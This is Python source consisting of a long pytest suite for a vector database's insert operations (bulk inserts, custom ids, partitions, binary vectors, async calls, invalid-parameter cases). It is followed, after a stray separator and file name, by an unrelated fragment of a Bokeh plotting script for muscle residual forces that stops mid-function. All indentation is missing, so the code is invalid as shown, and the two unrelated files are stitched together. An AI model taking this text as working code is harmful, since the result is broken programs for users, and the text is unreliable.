def test_insert_create_index_new(self, connect, collection, get_simple_index):
'''
target: test building index after inserting vectors
method: insert vectors and build index
expected: no error raised
'''
ids = connect.bulk_insert(collection, default_entities_new)
assert len(ids) == default_nb
connect.flush([collection])
connect.create_index(collection, field_name, get_simple_index)
info = connect.describe_collection(collection)
fields = info["fields"]
for field in fields:
if field["name"] == field_name:
assert field["indexes"][0] == get_simple_index
@pytest.mark.skip("create index")
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_after_create_index(self, connect, collection, get_simple_index):
'''
target: test inserting vectors after building index
method: build index and then insert vectors
expected: no error raised
'''
connect.create_index(collection, field_name, get_simple_index)
ids = connect.bulk_insert(collection, default_entities)
assert len(ids) == default_nb
info = connect.describe_collection(collection)
fields = info["fields"]
for field in fields:
if field["name"] == field_name:
assert field["indexes"][0] == get_simple_index
# @pytest.mark.skip(" later ")
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_search(self, connect, collection):
'''
target: test searching vectors after they have been inserted
method: insert vectors, flush, and search the collection
expected: no error raised
'''
ids = connect.bulk_insert(collection, default_entities)
connect.flush([collection])
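# flush seals the pending inserts so the freshly inserted entities are visible to search.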
res = connect.search(collection, default_single_query)
logging.getLogger().debug(res)
assert res
@pytest.mark.skip("segment row count")
def test_insert_segment_row_count(self, connect, collection):
nb = default_segment_row_limit + 1
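# Inserting one row more than default_segment_row_limit should yield two segments after
# flush: a full segment at the limit plus a one-row segment, which is what the
# assertions below check.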
res_ids = connect.bulk_insert(collection, gen_entities(nb))
connect.flush([collection])
assert len(res_ids) == nb
stats = connect.get_collection_stats(collection)
assert len(stats['partitions'][0]['segments']) == 2
for segment in stats['partitions'][0]['segments']:
assert segment['row_count'] in [default_segment_row_limit, 1]
@pytest.fixture(
scope="function",
params=[
1,
2000
],
)
def insert_count(self, request):
yield request.param
@pytest.mark.skip(" todo support count entities")
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_ids(self, connect, id_collection, insert_count):
'''
target: test insert vectors in collection, using customized ids
method: create collection and insert vectors in it, check the ids returned and the collection length after vectors inserted
expected: the returned ids match the customized ids and the collection row count equals nb
'''
nb = insert_count
ids = [i for i in range(nb)]
res_ids = connect.bulk_insert(id_collection, gen_entities(nb), ids)
connect.flush([id_collection])
assert len(res_ids) == nb
assert res_ids == ids
res_count = connect.count_entities(id_collection)
assert res_count == nb
@pytest.mark.skip(" todo support count entities")
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_the_same_ids(self, connect, id_collection, insert_count):
'''
target: test insert vectors in collection, using the same customized id for every entity
method: create collection and insert vectors in it, check the ids returned and the collection length after vectors inserted
expected: the returned ids match the customized ids and the collection row count equals nb
'''
nb = insert_count
ids = [1 for i in range(nb)]
res_ids = connect.bulk_insert(id_collection, gen_entities(nb), ids)
connect.flush([id_collection])
assert len(res_ids) == nb
assert res_ids == ids
res_count = connect.count_entities(id_collection)
assert res_count == nb
@pytest.mark.skip(" todo support count entities")
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_ids_fields(self, connect, get_filter_field, get_vector_field):
'''
target: test creating a normal collection with different fields and inserting entities with customized ids
method: create collection with diff fields: metric/field_type/..., insert, and count
expected: row count correct
'''
nb = 5
filter_field = get_filter_field
vector_field = get_vector_field
collection_name = gen_unique_str("test_collection")
fields = {
"fields": [filter_field, vector_field],
"segment_row_limit": default_segment_row_limit,
"auto_id": True
}
connect.create_collection(collection_name, fields)
ids = [i for i in range(nb)]
entities = gen_entities_by_fields(fields["fields"], nb, default_dim)
res_ids = connect.bulk_insert(collection_name, entities, ids)
assert res_ids == ids
connect.flush([collection_name])
res_count = connect.count_entities(collection_name)
assert res_count == nb
# TODO: assert exception && enable
@pytest.mark.level(2)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_twice_ids_no_ids(self, connect, id_collection):
'''
target: check the result of insert, with params ids and no ids
method: insert vectors twice, with customized ids first and then without ids
expected: error raised
'''
ids = [i for i in range(default_nb)]
res_ids = connect.bulk_insert(id_collection, default_entities, ids)
with pytest.raises(Exception) as e:
res_ids_new = connect.bulk_insert(id_collection, default_entities)
# TODO: assert exception && enable
@pytest.mark.level(2)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_twice_not_ids_ids(self, connect, id_collection):
'''
target: check the result of insert, with params ids and no ids
method: insert vectors twice, without ids first and then with customized ids
expected: error raised
'''
with pytest.raises(Exception) as e:
res_ids = connect.bulk_insert(id_collection, default_entities)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_ids_length_not_match_batch(self, connect, id_collection):
'''
target: test insert vectors in collection with customized ids where len(ids) != len(vectors)
method: create collection and insert vectors in it
expected: raise an exception
'''
ids = [i for i in range(1, default_nb)]
logging.getLogger().info(len(ids))
with pytest.raises(Exception) as e:
res_ids = connect.bulk_insert(id_collection, default_entities, ids)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_ids_length_not_match_single(self, connect, collection):
'''
target: test insert vectors in collection with customized ids where len(ids) != len(vectors)
method: create collection and insert vectors in it
expected: raise an exception
'''
ids = [i for i in range(1, default_nb)]
logging.getLogger().info(len(ids))
with pytest.raises(Exception) as e:
res_ids = connect.bulk_insert(collection, default_entity, ids)
@pytest.mark.skip(" todo support count entities")
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_without_ids_fields(self, connect, get_filter_field, get_vector_field):
'''
target: test creating a normal collection with different fields and inserting entities without customized ids
method: create collection with diff fields: metric/field_type/..., insert, and count
expected: row count correct
'''
nb = 5
filter_field = get_filter_field
vector_field = get_vector_field
collection_name = gen_unique_str("test_collection")
fields = {
"fields": [filter_field, vector_field],
"segment_row_limit": default_segment_row_limit
}
connect.create_collection(collection_name, fields)
entities = gen_entities_by_fields(fields["fields"], nb, default_dim)
res_ids = connect.bulk_insert(collection_name, entities)
connect.flush([collection_name])
res_count = connect.count_entities(collection_name)
assert res_count == nb
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_tag(self, connect, collection):
'''
target: test insert entities in collection created before
method: create collection and insert entities in it, with the partition_tag param
expected: the collection row count equals nb
'''
connect.create_partition(collection, default_tag)
ids = connect.bulk_insert(collection, default_entities, partition_tag=default_tag)
assert len(ids) == default_nb
assert connect.has_partition(collection, default_tag)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_tag_with_ids(self, connect, id_collection):
'''
target: test insert entities in collection created before, insert with ids
method: create collection and insert entities in it, with the partition_tag param
expected: the returned ids match the customized ids
'''
connect.create_partition(id_collection, default_tag)
ids = [i for i in range(default_nb)]
res_ids = connect.bulk_insert(id_collection, default_entities, ids, partition_tag=default_tag)
assert res_ids == ids
@pytest.mark.skip(" todo support count entities")
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_default_tag(self, connect, collection):
'''
target: test insert entities into default partition
method: create partition and insert into the collection without the tag param
expected: the collection row count equals to nb
'''
connect.create_partition(collection, default_tag)
ids = connect.bulk_insert(collection, default_entities)
connect.flush([collection])
assert len(ids) == default_nb
res_count = connect.count_entities(collection)
assert res_count == default_nb
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_tag_not_existed(self, connect, collection):
'''
target: test insert entities in collection created before
method: create collection and insert entities in it, with a non-existent partition_tag param
expected: error raised
'''
tag = gen_unique_str()
with pytest.raises(Exception) as e:
ids = connect.bulk_insert(collection, default_entities, partition_tag=tag)
@pytest.mark.skip(" not support count entities")
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_tag_existed(self, connect, collection):
'''
target: test insert entities in collection created before
method: create collection and insert entities in it repeatedly, with the partition_tag param
expected: the collection row count equals 2 * nb
'''
connect.create_partition(collection, default_tag)
ids = connect.bulk_insert(collection, default_entities, partition_tag=default_tag)
ids = connect.bulk_insert(collection, default_entities, partition_tag=default_tag)
connect.flush([collection])
res_count = connect.count_entities(collection)
assert res_count == 2 * default_nb
@pytest.mark.level(2)
def test_insert_without_connect(self, dis_connect, collection):
'''
target: test insert entities without connection
method: create collection and insert entities in it, check if inserted successfully
expected: raise exception
'''
with pytest.raises(Exception) as e:
ids = dis_connect.bulk_insert(collection, default_entities)
def test_insert_entities_collection_not_existed(self, connect):
'''
target: test insert entities into a collection that does not exist
method: insert entities into a non-existent collection, check the status
expected: error raised
'''
with pytest.raises(Exception) as e:
ids = connect.bulk_insert(gen_unique_str("not_exist_collection"), default_entities)
@pytest.mark.skip("to do add dim check ")
def test_insert_dim_not_matched(self, connect, collection):
'''
target: test insert entities, the vector dimension is not equal to the collection dimension
method: the entities dimension is half of the collection dimension, check the status
expected: error raised
'''
vectors = gen_vectors(default_nb, int(default_dim) // 2)
insert_entities = copy.deepcopy(default_entities)
insert_entities[-1]["values"] = vectors
with pytest.raises(Exception) as e:
ids = connect.bulk_insert(collection, insert_entities)
def test_insert_with_field_name_not_match(self, connect, collection):
'''
target: test insert entities, with the entity field name updated
method: update entity field name
expected: error raised
'''
tmp_entity = update_field_name(copy.deepcopy(default_entity), "int64", "int64new")
with pytest.raises(Exception):
connect.bulk_insert(collection, tmp_entity)
@pytest.mark.skip(" todo support type check")
def test_insert_with_field_type_not_match(self, connect, collection):
'''
target: test insert entities, with the entity field type updated
method: update entity field type
expected: error raised
'''
tmp_entity = update_field_type(copy.deepcopy(default_entity), "int64", DataType.FLOAT)
with pytest.raises(Exception):
connect.bulk_insert(collection, tmp_entity)
@pytest.mark.skip("to do add field_type check ")
@pytest.mark.level(2)
def test_insert_with_field_type_not_match_B(self, connect, collection):
'''
target: test insert entities, with the entity field type updated
method: update entity field type
expected: error raised
'''
tmp_entity = update_field_type(copy.deepcopy(default_entity), "int64", DataType.DOUBLE)
with pytest.raises(Exception):
connect.bulk_insert(collection, tmp_entity)
@pytest.mark.level(2)
def test_insert_with_field_value_not_match(self, connect, collection):
'''
target: test insert entities, with the entity field value updated
method: update entity field value
expected: error raised
'''
tmp_entity = update_field_value(copy.deepcopy(default_entity), DataType.FLOAT, 's')
with pytest.raises(Exception):
connect.bulk_insert(collection, tmp_entity)
def test_insert_with_field_more(self, connect, collection):
'''
target: test insert entities, with more fields than collection schema
method: add entity field
expected: error raised
'''
tmp_entity = add_field(copy.deepcopy(default_entity))
with pytest.raises(Exception):
connect.bulk_insert(collection, tmp_entity)
def test_insert_with_field_vector_more(self, connect, collection):
'''
target: test insert entities, with more fields than collection schema
method: add entity vector field
expected: error raised
'''
tmp_entity = add_vector_field(default_nb, default_dim)
with pytest.raises(Exception):
connect.bulk_insert(collection, tmp_entity)
def test_insert_with_field_less(self, connect, collection):
'''
target: test insert entities, with less fields than collection schema
method: remove entity field
expected: error raised
'''
tmp_entity = remove_field(copy.deepcopy(default_entity))
with pytest.raises(Exception):
connect.bulk_insert(collection, tmp_entity)
def test_insert_with_field_vector_less(self, connect, collection):
'''
target: test insert entities, with less fields than collection schema
method: remove entity vector field
expected: error raised
'''
tmp_entity = remove_vector_field(copy.deepcopy(default_entity))
with pytest.raises(Exception):
connect.bulk_insert(collection, tmp_entity)
def test_insert_with_no_field_vector_value(self, connect, collection):
'''
target: test insert entities, with no vector field value
method: remove entity vector field
expected: error raised
'''
tmp_entity = copy.deepcopy(default_entity)
del tmp_entity[-1]["values"]
with pytest.raises(Exception):
connect.bulk_insert(collection, tmp_entity)
def test_insert_with_no_field_vector_type(self, connect, collection):
'''
target: test insert entities, with no vector field type
method: remove entity vector field
expected: error raised
'''
tmp_entity = copy.deepcopy(default_entity)
del tmp_entity[-1]["type"]
with pytest.raises(Exception):
connect.bulk_insert(collection, tmp_entity)
def test_insert_with_no_field_vector_name(self, connect, collection):
'''
target: test insert entities, with no vector field name
method: remove entity vector field
expected: error raised
'''
tmp_entity = copy.deepcopy(default_entity)
del tmp_entity[-1]["name"]
with pytest.raises(Exception):
connect.bulk_insert(collection, tmp_entity)
@pytest.mark.skip("support count entities")
@pytest.mark.level(2)
@pytest.mark.timeout(30)
def test_collection_insert_rows_count_multi_threading(self, args, collection):
'''
target: test collection rows_count is correct or not with multi threading
method: create collection and insert entities in it (idmap),
assert the value returned by count_entities method is equal to length of entities
expected: the count is equal to the length of entities
'''
if args["handler"] == "HTTP":
pytest.skip("Skip test in http mode")
thread_num = 8
threads = []
milvus = get_milvus(host=args["ip"], port=args["port"], handler=args["handler"], try_connect=False)
def insert(thread_i):
logging.getLogger().info("In thread-%d" % thread_i)
milvus.bulk_insert(collection, default_entities)
milvus.flush([collection])
for i in range(thread_num):
t = MilvusTestThread(target=insert, args=(i,))
threads.append(t)
t.start()
for t in threads:
t.join()
res_count = milvus.count_entities(collection)
assert res_count == thread_num * default_nb
# TODO: unable to set config
@pytest.mark.skip("get entity by id")
@pytest.mark.level(2)
def _test_insert_disable_auto_flush(self, connect, collection):
'''
target: test insert entities, with disable autoflush
method: disable autoflush and insert, get entity
expected: the count is equal to 0
'''
delete_nums = 500
disable_flush(connect)
ids = connect.bulk_insert(collection, default_entities)
res = connect.get_entity_by_id(collection, ids[:delete_nums])
assert len(res) == delete_nums
assert res[0] is None
class TestInsertBinary:
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_binary_index(self, request):
request.param["metric_type"] = "JACCARD"
return request.param
@pytest.mark.skip("count entities")
def test_insert_binary_entities(self, connect, binary_collection):
'''
target: test insert entities in binary collection
method: create collection and insert binary entities in it
expected: the collection row count equals to nb
'''
ids = connect.bulk_insert(binary_collection, default_binary_entities)
assert len(ids) == default_nb
connect.flush()
assert connect.count_entities(binary_collection) == default_nb
@pytest.mark.skip("count entities")
def test_insert_binary_entities_new(self, connect, binary_collection):
'''
target: test insert entities in binary collection
method: create collection and insert binary entities in it
expected: the collection row count equals to nb
'''
ids = connect.bulk_insert(binary_collection, default_binary_entities_new)
assert len(ids) == default_nb
connect.flush()
assert connect.count_entities(binary_collection) == default_nb
# @pytest.mark.skip
def test_insert_binary_tag(self, connect, binary_collection):
'''
target: test insert entities and create partition tag
method: create collection and insert binary entities in it, with the partition_tag param
expected: the collection row count equals to nb
'''
connect.create_partition(binary_collection, default_tag)
ids = connect.bulk_insert(binary_collection, default_binary_entities, partition_tag=default_tag)
assert len(ids) == default_nb
assert connect.has_partition(binary_collection, default_tag)
@pytest.mark.skip("count entities")
@pytest.mark.level(2)
def test_insert_binary_multi_times(self, connect, binary_collection):
'''
target: test insert entities multi times and final flush
method: create collection and insert binary entity multi and final flush
expected: the collection row count equals to nb
'''
for i in range(default_nb):
ids = connect.bulk_insert(binary_collection, default_binary_entity)
assert len(ids) == 1
connect.flush([binary_collection])
assert connect.count_entities(binary_collection) == default_nb
@pytest.mark.skip("create index")
def test_insert_binary_after_create_index(self, connect, binary_collection, get_binary_index):
'''
target: test insert binary entities after build index
method: build index and insert entities
expected: no error raised
'''
connect.create_index(binary_collection, binary_field_name, get_binary_index)
ids = connect.bulk_insert(binary_collection, default_binary_entities)
assert len(ids) == default_nb
connect.flush([binary_collection])
info = connect.describe_collection(binary_collection)
fields = info["fields"]
for field in fields:
if field["name"] == binary_field_name:
assert field["indexes"][0] == get_binary_index
@pytest.mark.skip("create index")
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_binary_create_index(self, connect, binary_collection, get_binary_index):
'''
target: test building index after inserting binary vectors
method: insert binary vectors and build index
expected: no error raised
'''
ids = connect.bulk_insert(binary_collection, default_binary_entities)
assert len(ids) == default_nb
connect.flush([binary_collection])
connect.create_index(binary_collection, binary_field_name, get_binary_index)
info = connect.describe_collection(binary_collection)
fields = info["fields"]
for field in fields:
if field["name"] == binary_field_name:
assert field["indexes"][0] == get_binary_index
@pytest.mark.skip("binary search")
def test_insert_binary_search(self, connect, binary_collection):
'''
target: test searching binary vectors after they have been inserted
method: insert binary vectors, flush, and search the collection
expected: no error raised
'''
ids = connect.bulk_insert(binary_collection, default_binary_entities)
connect.flush([binary_collection])
query, vecs = gen_query_vectors(binary_field_name, default_binary_entities, default_top_k, 1, metric_type="JACCARD")
res = connect.search(binary_collection, query)
logging.getLogger().debug(res)
assert res
class TestInsertAsync:
@pytest.fixture(scope="function", autouse=True)
def skip_http_check(self, args):
if args["handler"] == "HTTP":
pytest.skip("skip in http mode")
@pytest.fixture(
scope="function",
params=[
1,
1000
],
)
def insert_count(self, request):
yield request.param
def check_status(self, result):
logging.getLogger().info("In callback check status")
assert not result
def check_result(self, result):
logging.getLogger().info("In callback check status")
assert result
def test_insert_async(self, connect, collection, insert_count):
'''
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
'''
nb = insert_count
future = connect.bulk_insert(collection, gen_entities(nb), _async=True)
ids = future.result()
connect.flush([collection])
assert len(ids) == nb
@pytest.mark.level(2)
def test_insert_async_false(self, connect, collection, insert_count):
'''
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
'''
nb = insert_count
ids = connect.bulk_insert(collection, gen_entities(nb), _async=False)
# ids = future.result()
connect.flush([collection])
assert len(ids) == nb
def test_insert_async_callback(self, connect, collection, insert_count):
'''
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
'''
nb = insert_count
future = connect.bulk_insert(collection, gen_entities(nb), _async=True, _callback=self.check_result)
future.done()
ids = future.result()
assert len(ids) == nb
@pytest.mark.skip("count entities")
@pytest.mark.level(2)
def test_insert_async_long(self, connect, collection):
'''
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
'''
nb = 50000
future = connect.bulk_insert(collection, gen_entities(nb), _async=True, _callback=self.check_result)
result = future.result()
assert len(result) == nb
connect.flush([collection])
count = connect.count_entities(collection)
logging.getLogger().info(count)
assert count == nb
@pytest.mark.skip("count entities")
@pytest.mark.level(2)
def test_insert_async_callback_timeout(self, connect, collection):
'''
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
'''
nb = 100000
future = connect.bulk_insert(collection, gen_entities(nb), _async=True, _callback=self.check_status, timeout=1)
with pytest.raises(Exception) as e:
result = future.result()
count = connect.count_entities(collection)
assert count == 0
def test_insert_async_invalid_params(self, connect):
'''
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: raise exception
'''
collection_new = gen_unique_str()
with pytest.raises(Exception) as e:
future = connect.bulk_insert(collection_new, default_entities, _async=True)
result = future.result()
def test_insert_async_invalid_params_raise_exception(self, connect, collection):
'''
target: test async insert with an empty entities list
method: insert an empty list asynchronously
expected: raise exception
'''
entities = []
with pytest.raises(Exception) as e:
future = connect.bulk_insert(collection, entities, _async=True)
future.result()
class TestInsertMultiCollections:
"""
******************************************************************
The following cases are used to test `insert` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
logging.getLogger().info(request.param)
if str(connect._cmd("mode")) == "CPU":
if request.param["index_type"] in index_cpu_not_support():
pytest.skip("sq8h not support in CPU mode")
return request.param
@pytest.mark.skip("count entities")
def test_insert_vector_multi_collections(self, connect):
'''
target: test insert entities
method: create 10 collections and insert entities into them in turn
expected: row count of each collection equals the number of entities inserted
'''
collection_num = 10
collection_list = []
for i in range(collection_num):
collection_name = gen_unique_str(uid)
collection_list.append(collection_name)
connect.create_collection(collection_name, default_fields)
ids = connect.bulk_insert(collection_name, default_entities)
connect.flush([collection_name])
assert len(ids) == default_nb
count = connect.count_entities(collection_name)
assert count == default_nb
@pytest.mark.timeout(ADD_TIMEOUT)
def test_drop_collection_insert_vector_another(self, connect, collection):
'''
target: test insert vector to collection_1 after collection_2 deleted
method: delete collection_2 and insert vector to collection_1
expected: row count equals the length of entities inserted
'''
collection_name = gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
connect.drop_collection(collection)
ids = connect.bulk_insert(collection_name, default_entity)
connect.flush([collection_name])
assert len(ids) == 1
@pytest.mark.skip("create index")
@pytest.mark.timeout(ADD_TIMEOUT)
def test_create_index_insert_vector_another(self, connect, collection, get_simple_index):
'''
target: test insert vector to collection_2 after build index for collection_1
method: build index and insert vector
expected: status ok
'''
collection_name = gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
connect.create_index(collection, field_name, get_simple_index)
ids = connect.bulk_insert(collection, default_entity)
connect.drop_collection(collection_name)
@pytest.mark.skip("create index")
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_vector_create_index_another(self, connect, collection, get_simple_index):
'''
target: test insert vector to collection_2 after build index for collection_1
method: build index and insert vector
expected: status ok
'''
collection_name = gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
ids = connect.bulk_insert(collection, default_entity)
connect.create_index(collection, field_name, get_simple_index)
count = connect.count_entities(collection_name)
assert count == 0
@pytest.mark.skip("create index")
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_vector_sleep_create_index_another(self, connect, collection, get_simple_index):
'''
target: test insert vector to collection_2 after build index for collection_1 for a while
method: build index and insert vector
expected: status ok
'''
collection_name = gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
ids = connect.bulk_insert(collection, default_entity)
connect.flush([collection])
connect.create_index(collection, field_name, get_simple_index)
count = connect.count_entities(collection)
assert count == 1
@pytest.mark.skip("count entities")
@pytest.mark.timeout(ADD_TIMEOUT)
def test_search_vector_insert_vector_another(self, connect, collection):
'''
target: test insert vector to collection_1 after search collection_2
method: search collection and insert vector
expected: status ok
'''
collection_name = gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
res = connect.search(collection, default_single_query)
logging.getLogger().debug(res)
ids = connect.bulk_insert(collection_name, default_entity)
connect.flush()
count = connect.count_entities(collection_name)
assert count == 1
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_vector_search_vector_another(self, connect, collection):
'''
target: test insert vector to collection_1 after search collection_2
method: search collection and insert vector
expected: status ok
'''
collection_name = gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
ids = connect.bulk_insert(collection, default_entity)
result = connect.search(collection_name, default_single_query)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_vector_sleep_search_vector_another(self, connect, collection):
'''
target: test insert vector to collection_1 after search collection_2 a while
method: search collection , sleep, and insert vector
expected: status ok
'''
collection_name = gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
ids = connect.bulk_insert(collection, default_entity)
connect.flush([collection])
result = connect.search(collection_name, default_single_query)
class TestInsertInvalid(object):
"""
Test inserting vectors with invalid params (collection names, partition tags, field names/values, ids)
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_tag_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_field_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_field_type(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_field_int_value(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_ints()
)
def get_entity_id(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_vectors()
)
def get_field_vectors_value(self, request):
yield request.param
def test_insert_ids_invalid(self, connect, id_collection, get_entity_id):
'''
target: test insert, with using customize ids, which are not int64
method: create collection and insert entities in it
expected: raise an exception
'''
entity_id = get_entity_id
ids = [entity_id for _ in range(default_nb)]
with pytest.raises(Exception):
connect.bulk_insert(id_collection, default_entities, ids)
def test_insert_with_invalid_collection_name(self, connect, get_collection_name):
collection_name = get_collection_name
with pytest.raises(Exception):
connect.bulk_insert(collection_name, default_entity)
def test_insert_with_invalid_tag_name(self, connect, collection, get_tag_name):
tag_name = get_tag_name
connect.create_partition(collection, default_tag)
if tag_name is not None:
with pytest.raises(Exception):
connect.bulk_insert(collection, default_entity, partition_tag=tag_name)
else:
connect.bulk_insert(collection, default_entity, partition_tag=tag_name)
def test_insert_with_invalid_field_name(self, connect, collection, get_field_name):
field_name = get_field_name
tmp_entity = update_field_name(copy.deepcopy(default_entity), "int64", get_field_name)
with pytest.raises(Exception):
connect.bulk_insert(collection, tmp_entity)
@pytest.mark.skip("laster add check of field type")
def test_insert_with_invalid_field_type(self, connect, collection, get_field_type):
field_type = get_field_type
tmp_entity = update_field_type(copy.deepcopy(default_entity), 'float', field_type)
with pytest.raises(Exception):
connect.bulk_insert(collection, tmp_entity)
@pytest.mark.skip("laster add check of field value")
def test_insert_with_invalid_field_value(self, connect, collection, get_field_int_value):
field_value = get_field_int_value
tmp_entity = update_field_type(copy.deepcopy(default_entity), 'int64', field_value)
with pytest.raises(Exception):
connect.bulk_insert(collection, tmp_entity)
def test_insert_with_invalid_field_vector_value(self, connect, collection, get_field_vectors_value):
tmp_entity = copy.deepcopy(default_entity)
src_vector = tmp_entity[-1]["values"]
src_vector[0][1] = get_field_vectors_value
with pytest.raises(Exception):
connect.bulk_insert(collection, tmp_entity)
class TestInsertInvalidBinary(object):
"""
Test inserting binary vectors with invalid params (field names/values, vectors, ids)
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_tag_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_field_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_field_type(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_field_int_value(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_ints()
)
def get_entity_id(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_vectors()
)
def get_field_vectors_value(self, request):
yield request.param
@pytest.mark.level(2)
def test_insert_with_invalid_field_name(self, connect, binary_collection, get_field_name):
tmp_entity = update_field_name(copy.deepcopy(default_binary_entity), "int64", get_field_name)
with pytest.raises(Exception):
connect.bulk_insert(binary_collection, tmp_entity)
@pytest.mark.skip("todo support row data check")
@pytest.mark.level(2)
def test_insert_with_invalid_field_value(self, connect, binary_collection, get_field_int_value):
tmp_entity = update_field_type(copy.deepcopy(default_binary_entity), 'int64', get_field_int_value)
with pytest.raises(Exception):
connect.bulk_insert(binary_collection, tmp_entity)
@pytest.mark.skip("todo support row data check")
@pytest.mark.level(2)
def test_insert_with_invalid_field_vector_value(self, connect, binary_collection, get_field_vectors_value):
tmp_entity = copy.deepcopy(default_binary_entity)
src_vector = tmp_entity[-1]["values"]
src_vector[0][1] = get_field_vectors_value
with pytest.raises(Exception):
connect.bulk_insert(binary_collection, tmp_entity)
@pytest.mark.level(2)
def test_insert_ids_invalid(self, connect, binary_id_collection, get_entity_id):
'''
target: test insert, with using customize ids, which are not int64
method: create collection and insert entities in it
expected: raise an exception
'''
entity_id = get_entity_id
ids = [entity_id for _ in range(default_nb)]
with pytest.raises(Exception):
connect.bulk_insert(binary_id_collection, default_binary_entities, ids)
@pytest.mark.skip("check filed")
@pytest.mark.level(2)
def test_insert_with_invalid_field_type(self, connect, binary_collection, get_field_type):
field_type = get_field_type
tmp_entity = update_field_type(copy.deepcopy(default_binary_entity), 'int64', field_type)
with pytest.raises(Exception):
connect.bulk_insert(binary_collection, tmp_entity)
@pytest.mark.skip("check field")
@pytest.mark.level(2)
def test_insert_with_invalid_field_vector_value(self, connect, binary_collection, get_field_vectors_value):
tmp_entity = copy.deepcopy(default_binary_entities)
src_vector = tmp_entity[-1]["values"]
src_vector[1] = get_field_vectors_value
with pytest.raises(Exception):
connect.bulk_insert(binary_collection, tmp_entity)
|
threadHistResForces.py | from bokeh.io import curdoc
from bokeh.models import ColumnDataSource
from bokeh.plotting import figure
from bokeh.layouts import gridplot, row, layout, column
import numpy as np
import time
import cProfile
import random
import zmq
import pickle
import pdb
from bokeh.models import LinearAxis, Range1d
from bokeh.models import Span
from functools import partial
from threading import Thread
from tornado import gen
from helper_functions import *
rpi_emulator = True
brian = False
if rpi_emulator:
ip = '127.0.0.1'
elif brian:
ip = '169.254.12.240'
else:
ip = '10.42.0.82'
port_sub = '12345'
doc = curdoc()
source_forces = ColumnDataSource(dict(time=[],residual_M0=[],residual_M1=[],residual_M2=[],residual_M3=[],residual_M4=[],residual_M5=[],residual_M6=[]))
source_plot = ColumnDataSource(dict(hist_M0=[],hist_M1=[],hist_M2=[],hist_M3=[],hist_M4=[],hist_M5=[],hist_M6=[],ledges_M0=[], ledges_M1=[], ledges_M2=[], ledges_M3=[], ledges_M4=[], ledges_M5=[], ledges_M6=[], redges_M0=[], redges_M1=[], redges_M2=[], redges_M3=[], redges_M4=[], redges_M5=[], redges_M6=[]))
@gen.coroutine
def update(plotData,residualForces):
source_forces.stream(residualForces,100)
source_plot.stream(plotData,100)
def modify_to_plot():
hist = []
edges = []
for i in range(7):
histogram = np.histogram(source_forces.data['residual_M%s'%i])
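# Offset this muscle's bin edges by its index so the seven histograms are drawn side by side on the shared x-axis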
for j in range(len(histogram[1])):
histogram[1][j] = (histogram[1][j] + i*1)
hist.append(histogram[0])
edges.append(histogram[1])
return(hist,edges)
def compose_column_data_source_entry(timestamp, residualForces, hist, edges):
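# Pack the per-muscle residual forces and histogram columns into the dict layouts expected by the two ColumnDataSources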
residualForces = dict(time=[timestamp],residual_M0=[residualForces[0]],residual_M1=[residualForces[1]],residual_M2=[residualForces[2]],residual_M3=[residualForces[3]],residual_M4=[residualForces[4]],residual_M5=[residualForces[5]],residual_M6=[residualForces[6]])
